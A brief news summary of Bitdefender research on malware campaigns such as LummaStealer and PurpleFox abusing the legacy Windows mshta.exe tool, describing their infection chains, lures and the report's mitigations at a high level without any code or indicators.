Microsoft’s MSHTA Legacy Tool Still Powers Malware Campaigns on Windows

Bitdefender researchers analyzed widespread abuse of the legacy Windows mshta.exe utility by multiple criminal campaigns (CountLoader, Emmenhtal Loader, LummaStealer, Amatera, ClipBanker, PurpleFox). The report describes multi-stage, often fileless infection chains leveraging obfuscated HTA and PowerShell code, social-engineering lures (fake installers, clipboard hijack “human verification” pages), detailed IoCs (domains, URLs, IPs, SHA256s), observed infrastructure shifts (TLD patterns), and recommended user and technical mitigations to reduce exposure.